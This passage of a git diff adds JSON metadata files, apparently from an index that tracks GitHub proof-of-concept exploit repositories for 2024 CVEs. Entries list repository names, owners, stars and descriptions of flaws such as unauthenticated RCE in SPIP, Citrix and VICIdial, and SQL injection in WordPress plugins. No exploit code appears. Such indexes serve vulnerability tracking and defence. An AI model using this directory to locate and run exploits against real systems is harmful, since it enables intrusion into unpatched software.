"https:\/\/github.com\/issamjr\/CVE-2024-7954", + "description": "The porte_plume plugin used by SPIP before 4.30-alpha2, 4.2.13, and 4.1.16 is vulnerable to an arbitrary code execution vulnerability. A remote and unauthenticated attacker can execute arbitrary PHP as the SPIP user by sending a crafted HTTP request.", + "fork": false, + "created_at": "2024-11-15T21:08:47Z", + "updated_at": "2024-11-15T22:51:47Z", + "pushed_at": "2024-11-15T21:10:55Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 906301837, + "name": "CVE-2024-7954POC", + "full_name": "zxj-hub\/CVE-2024-7954POC", + "owner": { + "login": "zxj-hub", + "id": 192207002, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/192207002?v=4", + "html_url": "https:\/\/github.com\/zxj-hub", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/zxj-hub\/CVE-2024-7954POC", + "description": "SPIP 4.30-alpha2、4.2.13、4.1.16之前的版本使用的porte_plume插件存在任意代码执行漏洞,远程未经身份验证的攻击者可以通过发送精心设计的HTTP 请求以SPIP用户身份执行任意PHP代码。", + "fork": false, + "created_at": "2024-12-20T15:40:35Z", + "updated_at": "2024-12-20T15:40:39Z", + "pushed_at": "2024-12-20T15:40:36Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 909188493, + "name": "RCE_CVE-2024-7954-", + "full_name": "0dayan0n\/RCE_CVE-2024-7954-", + "owner": { + "login": "0dayan0n", + "id": 170557167, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/170557167?v=4", + "html_url": "https:\/\/github.com\/0dayan0n", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0dayan0n\/RCE_CVE-2024-7954-", + "description": "The porte_plume plugin used by SPIP before 4.30-alpha2, 4.2.13, and 4.1.16 is vulnerable to an arbitrary code execution vulnerability. A remote and unauthenticated attacker can execute arbitrary PHP as the SPIP user by sending a crafted HTTP request. (CRITICAL)", + "fork": false, + "created_at": "2024-12-28T01:05:05Z", + "updated_at": "2024-12-28T01:20:15Z", + "pushed_at": "2024-12-28T01:20:12Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-7965.json b/2024/CVE-2024-7965.json new file mode 100644 index 0000000000..22b376773d --- /dev/null +++ b/2024/CVE-2024-7965.json @@ -0,0 +1,69 @@ +[ + { + "id": 858363141, + "name": "CVE-2024-7965", + "full_name": "bi-zone\/CVE-2024-7965", + "owner": { + "login": "bi-zone", + "id": 30549217, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/30549217?v=4", + "html_url": "https:\/\/github.com\/bi-zone", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bi-zone\/CVE-2024-7965", + "description": "This repository contains PoC for CVE-2024-7965. This is the vulnerability in the V8 that occurs only within ARM64.", + "fork": false, + "created_at": "2024-09-16T19:04:57Z", + "updated_at": "2024-12-06T09:40:43Z", + "pushed_at": "2024-09-16T19:44:54Z", + "stargazers_count": 44, + "watchers_count": 44, + "has_discussions": false, + "forks_count": 9, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 9, + "watchers": 44, + "score": 0, + "subscribers_count": 5 + }, + { + "id": 892392509, + "name": "cve-2024-7965-poc", + "full_name": "XiaomingX\/cve-2024-7965-poc", + "owner": { + "login": "XiaomingX", + "id": 5387930, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5387930?v=4", + "html_url": "https:\/\/github.com\/XiaomingX", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/XiaomingX\/cve-2024-7965-poc", + "description": "CVE-2024-7965是Google Chrome浏览器中V8 JavaScript引擎的一个高危漏洞。该漏洞源于V8引擎在处理特定JavaScript代码时实现不当,导致堆内存损坏。攻击者可通过诱导用户访问包含特制JavaScript的恶意网页,利用此漏洞在Chrome渲染器中执行任意代码。", + "fork": false, + "created_at": "2024-11-22T02:55:33Z", + "updated_at": "2024-12-08T18:37:36Z", + "pushed_at": "2024-11-22T02:58:00Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2024-7965", + "exp", + "poc" + ], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-8069.json b/2024/CVE-2024-8069.json new file mode 100644 index 0000000000..b41e096e09 --- /dev/null +++ b/2024/CVE-2024-8069.json @@ -0,0 +1,39 @@ +[ + { + "id": 887638974, + "name": "cve-2024-8069-exp-Citrix-Virtual-Apps-XEN", + "full_name": "XiaomingX\/cve-2024-8069-exp-Citrix-Virtual-Apps-XEN", + "owner": { + "login": "XiaomingX", + "id": 5387930, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5387930?v=4", + "html_url": "https:\/\/github.com\/XiaomingX", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/XiaomingX\/cve-2024-8069-exp-Citrix-Virtual-Apps-XEN", + "description": "Citrix Virtual Apps and Desktops (XEN) Unauthenticated RCE", + "fork": false, + "created_at": "2024-11-13T02:50:56Z", + "updated_at": "2024-12-30T08:36:13Z", + "pushed_at": "2024-11-29T03:02:09Z", + "stargazers_count": 14, + "watchers_count": 14, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "exploit", + "poc", + "rce", + "vulnerability" + ], + "visibility": "public", + "forks": 3, + "watchers": 14, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-8190.json b/2024/CVE-2024-8190.json new file mode 100644 index 0000000000..6988135637 --- /dev/null +++ b/2024/CVE-2024-8190.json @@ -0,0 +1,33 @@ +[ + { + "id": 858260109, + "name": "CVE-2024-8190", + "full_name": "horizon3ai\/CVE-2024-8190", + "owner": { + "login": "horizon3ai", + "id": 79593994, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79593994?v=4", + "html_url": "https:\/\/github.com\/horizon3ai", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/horizon3ai\/CVE-2024-8190", + "description": "CVE-2024-8190: Ivanti Cloud Service Appliance Command Injection", + "fork": false, + "created_at": "2024-09-16T15:33:46Z", + "updated_at": "2025-01-01T13:11:11Z", + "pushed_at": "2024-09-16T15:43:44Z", + "stargazers_count": 13, + "watchers_count": 13, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 13, + "score": 0, + "subscribers_count": 5 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-8275.json b/2024/CVE-2024-8275.json new file mode 100644 index 0000000000..213a628cfe --- /dev/null +++ b/2024/CVE-2024-8275.json @@ -0,0 +1,64 @@ +[ + { + "id": 863368849, + "name": "CVE-2024-8275", + "full_name": "p33d\/CVE-2024-8275", + "owner": { + "login": "p33d", + "id": 123099747, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/123099747?v=4", + "html_url": "https:\/\/github.com\/p33d", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/p33d\/CVE-2024-8275", + "description": null, + "fork": false, + "created_at": "2024-09-26T07:16:21Z", + "updated_at": "2024-09-26T11:10:23Z", + "pushed_at": "2024-09-26T11:10:19Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 886590910, + "name": "CVE-2024-8275", + "full_name": "whiterose7777\/CVE-2024-8275", + "owner": { + "login": "whiterose7777", + "id": 174041119, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/174041119?v=4", + "html_url": "https:\/\/github.com\/whiterose7777", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/whiterose7777\/CVE-2024-8275", + "description": null, + "fork": false, + "created_at": "2024-11-11T08:53:27Z", + "updated_at": "2024-11-12T08:52:35Z", + "pushed_at": "2024-11-11T08:56:09Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-8277.json b/2024/CVE-2024-8277.json new file mode 100644 index 0000000000..12b5d97c26 --- /dev/null +++ b/2024/CVE-2024-8277.json @@ -0,0 +1,33 @@ +[ + { + "id": 856416225, + "name": "CVE-2024-8277", + "full_name": "PolatBey\/CVE-2024-8277", + "owner": { + "login": "PolatBey", + "id": 25030792, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25030792?v=4", + "html_url": "https:\/\/github.com\/PolatBey", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/PolatBey\/CVE-2024-8277", + "description": "CVE-2024-8277 - 0Day Auto Exploit Authentication Bypass in WooCommerce Photo Reviews Plugin", + "fork": false, + "created_at": "2024-09-12T14:40:59Z", + "updated_at": "2024-09-12T14:40:59Z", + "pushed_at": "2024-09-12T14:41:35Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-8309.json b/2024/CVE-2024-8309.json new file mode 100644 index 0000000000..125e9f6551 --- /dev/null +++ b/2024/CVE-2024-8309.json @@ -0,0 +1,33 @@ +[ + { + "id": 864608875, + "name": "CVE-2024-8309", + "full_name": "liadlevy\/CVE-2024-8309", + "owner": { + "login": "liadlevy", + "id": 59486223, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59486223?v=4", + "html_url": "https:\/\/github.com\/liadlevy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/liadlevy\/CVE-2024-8309", + "description": "A PoC for CVE-2024–8309", + "fork": false, + "created_at": "2024-09-28T17:11:52Z", + "updated_at": "2024-12-02T17:50:28Z", + "pushed_at": "2024-10-05T20:40:16Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-8349.json b/2024/CVE-2024-8349.json new file mode 100644 index 0000000000..f1badcd066 --- /dev/null +++ b/2024/CVE-2024-8349.json @@ -0,0 +1,33 @@ +[ + { + "id": 858761331, + "name": "CVE-2024-8349-and-CVE-2024-8350", + "full_name": "karlemilnikka\/CVE-2024-8349-and-CVE-2024-8350", + "owner": { + "login": "karlemilnikka", + "id": 20514810, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20514810?v=4", + "html_url": "https:\/\/github.com\/karlemilnikka", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/karlemilnikka\/CVE-2024-8349-and-CVE-2024-8350", + "description": "Authenticated Privilege Escalation to Admin exploiting Uncanny Groups for LearnDash.", + "fork": false, + "created_at": "2024-09-17T13:44:04Z", + "updated_at": "2024-09-24T14:34:21Z", + "pushed_at": "2024-09-24T14:34:18Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-8353.json b/2024/CVE-2024-8353.json new file mode 100644 index 0000000000..8553a0b671 --- /dev/null +++ b/2024/CVE-2024-8353.json @@ -0,0 +1,41 @@ +[ + { + "id": 865536429, + "name": "CVE-2024-8353", + "full_name": "EQSTLab\/CVE-2024-8353", + "owner": { + "login": "EQSTLab", + "id": 148991397, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/148991397?v=4", + "html_url": "https:\/\/github.com\/EQSTLab", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/EQSTLab\/CVE-2024-8353", + "description": "Proof-of-Concept for CVE-2024-8353", + "fork": false, + "created_at": "2024-09-30T17:33:59Z", + "updated_at": "2024-12-30T09:03:41Z", + "pushed_at": "2024-10-01T00:04:52Z", + "stargazers_count": 11, + "watchers_count": 11, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "exploit", + "php", + "poc", + "proof-of-concept", + "security", + "vulnerability" + ], + "visibility": "public", + "forks": 2, + "watchers": 11, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-8484.json b/2024/CVE-2024-8484.json new file mode 100644 index 0000000000..4031b3199f --- /dev/null +++ b/2024/CVE-2024-8484.json @@ -0,0 +1,33 @@ +[ + { + "id": 862372924, + "name": "CVE-2024-8484", + "full_name": "RandomRobbieBF\/CVE-2024-8484", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2024-8484", + "description": "REST API TO MiniProgram <= 4.7.1 - Unauthenticated SQL Injection", + "fork": false, + "created_at": "2024-09-24T13:46:02Z", + "updated_at": "2024-10-18T17:57:35Z", + "pushed_at": "2024-09-24T13:49:32Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-8504.json b/2024/CVE-2024-8504.json new file mode 100644 index 0000000000..945131c815 --- /dev/null +++ b/2024/CVE-2024-8504.json @@ -0,0 +1,64 @@ +[ + { + "id": 857247047, + "name": "CVE-2024-8504", + "full_name": "Chocapikk\/CVE-2024-8504", + "owner": { + "login": "Chocapikk", + "id": 88535377, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88535377?v=4", + "html_url": "https:\/\/github.com\/Chocapikk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Chocapikk\/CVE-2024-8504", + "description": "VICIdial Unauthenticated SQLi to RCE Exploit (CVE-2024-8503 and CVE-2024-8504)", + "fork": false, + "created_at": "2024-09-14T06:27:11Z", + "updated_at": "2024-12-29T06:12:09Z", + "pushed_at": "2024-09-15T21:34:35Z", + "stargazers_count": 39, + "watchers_count": 39, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 39, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 861411441, + "name": "ViciDial", + "full_name": "havokzero\/ViciDial", + "owner": { + "login": "havokzero", + "id": 46027877, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46027877?v=4", + "html_url": "https:\/\/github.com\/havokzero", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/havokzero\/ViciDial", + "description": "CVE-2024-8504", + "fork": false, + "created_at": "2024-09-22T20:17:10Z", + "updated_at": "2024-12-23T19:59:21Z", + "pushed_at": "2024-10-04T00:43:08Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-8517.json b/2024/CVE-2024-8517.json new file mode 100644 index 0000000000..8b0921bc82 --- /dev/null +++ b/2024/CVE-2024-8517.json @@ -0,0 +1,33 @@ +[ + { + "id": 853472932, + "name": "CVE-2024-8517", + "full_name": "Chocapikk\/CVE-2024-8517", + "owner": { + "login": "Chocapikk", + "id": 88535377, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88535377?v=4", + "html_url": "https:\/\/github.com\/Chocapikk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Chocapikk\/CVE-2024-8517", + "description": "SPIP BigUp Plugin Unauthenticated RCE", + "fork": false, + "created_at": "2024-09-06T18:17:18Z", + "updated_at": "2024-12-25T19:00:10Z", + "pushed_at": "2024-09-07T00:12:51Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 9, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-8522.json b/2024/CVE-2024-8522.json new file mode 100644 index 0000000000..e26a122412 --- /dev/null +++ b/2024/CVE-2024-8522.json @@ -0,0 +1,33 @@ +[ + { + "id": 859722645, + "name": "CVE-2024-8522", + "full_name": "Avento\/CVE-2024-8522", + "owner": { + "login": "Avento", + "id": 13798539, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13798539?v=4", + "html_url": "https:\/\/github.com\/Avento", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Avento\/CVE-2024-8522", + "description": "LearnPress – WordPress LMS Plugin <= 4.2.7 - Unauthenticated SQL Injection via 'c_only_fields'", + "fork": false, + "created_at": "2024-09-19T07:04:12Z", + "updated_at": "2024-10-12T13:02:49Z", + "pushed_at": "2024-09-19T07:06:15Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-8529.json b/2024/CVE-2024-8529.json new file mode 100644 index 0000000000..33a05f47b6 --- /dev/null +++ b/2024/CVE-2024-8529.json @@ -0,0 +1,33 @@ +[ + { + "id": 871753655, + "name": "CVE-2024-8529", + "full_name": "RandomRobbieBF\/CVE-2024-8529", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2024-8529", + "description": "LearnPress – WordPress LMS Plugin <= 4.2.7 - Unauthenticated SQL Injection via 'c_fields'", + "fork": false, + "created_at": "2024-10-12T20:52:32Z", + "updated_at": "2024-10-20T20:02:46Z", + "pushed_at": "2024-10-12T20:55:55Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-8672.json b/2024/CVE-2024-8672.json new file mode 100644 index 0000000000..2acd7c7b7c --- /dev/null +++ b/2024/CVE-2024-8672.json @@ -0,0 +1,33 @@ +[ + { + "id": 897538365, + "name": "CVE-2024-8672", + "full_name": "Chocapikk\/CVE-2024-8672", + "owner": { + "login": "Chocapikk", + "id": 88535377, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88535377?v=4", + "html_url": "https:\/\/github.com\/Chocapikk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Chocapikk\/CVE-2024-8672", + "description": "Widget Options – The #1 WordPress Widget & Block Control Plugin <= 4.0.7 - Authenticated (Contributor+) Remote Code Execution", + "fork": false, + "created_at": "2024-12-02T19:59:31Z", + "updated_at": "2024-12-20T20:39:53Z", + "pushed_at": "2024-12-02T20:00:09Z", + "stargazers_count": 11, + "watchers_count": 11, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 11, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-8698.json b/2024/CVE-2024-8698.json new file mode 100644 index 0000000000..36658f1ac1 --- /dev/null +++ b/2024/CVE-2024-8698.json @@ -0,0 +1,33 @@ +[ + { + "id": 870632664, + "name": "CVE-2024-8698-POC", + "full_name": "huydoppaz\/CVE-2024-8698-POC", + "owner": { + "login": "huydoppaz", + "id": 180631518, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/180631518?v=4", + "html_url": "https:\/\/github.com\/huydoppaz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/huydoppaz\/CVE-2024-8698-POC", + "description": "i'm noob with saml and keycloak . J4f", + "fork": false, + "created_at": "2024-10-10T11:50:07Z", + "updated_at": "2024-10-13T15:06:35Z", + "pushed_at": "2024-10-10T12:09:42Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-8752.json b/2024/CVE-2024-8752.json new file mode 100644 index 0000000000..158c9918fe --- /dev/null +++ b/2024/CVE-2024-8752.json @@ -0,0 +1,33 @@ +[ + { + "id": 859630956, + "name": "CVE-2024-8752", + "full_name": "D3anSPGDMS\/CVE-2024-8752", + "owner": { + "login": "D3anSPGDMS", + "id": 179800496, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/179800496?v=4", + "html_url": "https:\/\/github.com\/D3anSPGDMS", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/D3anSPGDMS\/CVE-2024-8752", + "description": "poc of cve-2024-8752(WebIQ 2.15.9)", + "fork": false, + "created_at": "2024-09-19T02:20:48Z", + "updated_at": "2024-09-19T02:28:30Z", + "pushed_at": "2024-09-19T02:28:27Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-8856.json b/2024/CVE-2024-8856.json new file mode 100644 index 0000000000..faa12a2eac --- /dev/null +++ b/2024/CVE-2024-8856.json @@ -0,0 +1,74 @@ +[ + { + "id": 889626915, + "name": "CVE-2024-8856", + "full_name": "ubaii\/CVE-2024-8856", + "owner": { + "login": "ubaii", + "id": 31325580, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/31325580?v=4", + "html_url": "https:\/\/github.com\/ubaii", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ubaii\/CVE-2024-8856", + "description": "WordPress WP Time Capsule Plugin Arbitrary File Upload Vulnerability", + "fork": false, + "created_at": "2024-11-16T20:04:11Z", + "updated_at": "2024-12-17T04:33:41Z", + "pushed_at": "2024-11-16T20:04:45Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 891847903, + "name": "CVE-2024-8856", + "full_name": "Jenderal92\/CVE-2024-8856", + "owner": { + "login": "Jenderal92", + "id": 59664965, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59664965?v=4", + "html_url": "https:\/\/github.com\/Jenderal92", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Jenderal92\/CVE-2024-8856", + "description": "This tool scans WordPress websites for vulnerabilities in the WP Time Capsule plugin related to CVE-2024-8856. It identifies plugin versions below 1.22.22 as vulnerable and logs results to vuln.txt. Simple and efficient, it helps security researchers and admins detect and address risks quickly.", + "fork": false, + "created_at": "2024-11-21T04:01:27Z", + "updated_at": "2024-12-14T00:19:07Z", + "pushed_at": "2024-11-21T04:41:25Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2024-8856", + "cve-scanner", + "plugin-vulnerability", + "security-tools", + "vulnerability", + "wordpress", + "wordpress-plugin-scanner", + "wordpress-security", + "wp-time-capsule" + ], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-8868.json b/2024/CVE-2024-8868.json new file mode 100644 index 0000000000..f9216b793e --- /dev/null +++ b/2024/CVE-2024-8868.json @@ -0,0 +1,33 @@ +[ + { + "id": 619573346, + "name": "CVE-2024-8868", + "full_name": "M0onc\/CVE-2024-8868", + "owner": { + "login": "M0onc", + "id": 129066230, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/129066230?v=4", + "html_url": "https:\/\/github.com\/M0onc", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/M0onc\/CVE-2024-8868", + "description": "1", + "fork": false, + "created_at": "2023-03-27T12:08:34Z", + "updated_at": "2024-11-04T03:59:54Z", + "pushed_at": "2023-03-27T12:08:34Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-8949.json b/2024/CVE-2024-8949.json new file mode 100644 index 0000000000..f1a754474a --- /dev/null +++ b/2024/CVE-2024-8949.json @@ -0,0 +1,33 @@ +[ + { + "id": 864585046, + "name": "CVE-2024-8949-POC", + "full_name": "gh-ost00\/CVE-2024-8949-POC", + "owner": { + "login": "gh-ost00", + "id": 153366162, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/153366162?v=4", + "html_url": "https:\/\/github.com\/gh-ost00", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gh-ost00\/CVE-2024-8949-POC", + "description": "SourceCodester Online Eyewear Shop Remote File Inclusion Vulnerability", + "fork": false, + "created_at": "2024-09-28T15:58:54Z", + "updated_at": "2024-12-21T06:40:14Z", + "pushed_at": "2024-09-28T16:06:30Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-8963.json b/2024/CVE-2024-8963.json new file mode 100644 index 0000000000..d49f833256 --- /dev/null +++ b/2024/CVE-2024-8963.json @@ -0,0 +1,33 @@ +[ + { + "id": 887922973, + "name": "CVE-2024-8963", + "full_name": "patfire94\/CVE-2024-8963", + "owner": { + "login": "patfire94", + "id": 167763968, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/167763968?v=4", + "html_url": "https:\/\/github.com\/patfire94", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/patfire94\/CVE-2024-8963", + "description": "Ivanti Cloud Services Appliance - Path Traversal", + "fork": false, + "created_at": "2024-11-13T14:12:57Z", + "updated_at": "2024-11-13T20:10:06Z", + "pushed_at": "2024-11-13T20:10:03Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-9014.json b/2024/CVE-2024-9014.json new file mode 100644 index 0000000000..05e56f5d5f --- /dev/null +++ b/2024/CVE-2024-9014.json @@ -0,0 +1,33 @@ +[ + { + "id": 863460886, + "name": "CVE-2024-9014", + "full_name": "EQSTLab\/CVE-2024-9014", + "owner": { + "login": "EQSTLab", + "id": 148991397, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/148991397?v=4", + "html_url": "https:\/\/github.com\/EQSTLab", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/EQSTLab\/CVE-2024-9014", + "description": "Proof-of-Concept for CVE-2024-9014", + "fork": false, + "created_at": "2024-09-26T10:34:34Z", + "updated_at": "2024-10-15T07:52:36Z", + "pushed_at": "2024-09-26T10:45:34Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, 